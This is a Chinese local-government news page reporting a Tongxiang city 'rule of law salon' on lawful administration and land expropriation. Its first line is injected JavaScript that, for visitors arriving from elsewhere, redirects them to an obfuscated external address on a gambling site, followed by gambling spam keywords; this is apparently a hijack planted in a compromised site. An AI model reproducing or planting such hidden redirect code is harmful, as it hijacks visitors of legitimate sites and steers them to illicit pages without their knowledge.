var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 各地信息
发布日期:2019-10-30 浏览次数: 字号:[ ]

日前,桐乡市举行领导干部“法治沙龙”交流会议。桐乡市副市长沈根潮、副市长徐刚,市人民法院院长许邦清,相关职能部门及镇(街道)主要负责人参加会议  

本次“法治沙龙”的主题是“依法行政与依法征迁”,与会人员紧密结合征迁工作,对工作推进过程中遇到的重点难点进行了充分的挖掘和细致的分析,并对科学、有序、依法推进征迁工作提出了新的思路与建议。  

对做好下阶段依法征迁工作,会议指出,一是要继续做实征迁前期工作,切实提升整个征迁进程的效率;二是要继续注重工作方式方法,要重视群众意见、经常性开展群众工作,阶段式推进征迁进程;三是要继续提升征迁队伍的政治素养、业务能力和精神状态,建设一支素质高、战斗力强的队伍来保障征迁工作的顺利推进。

桐乡市局

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统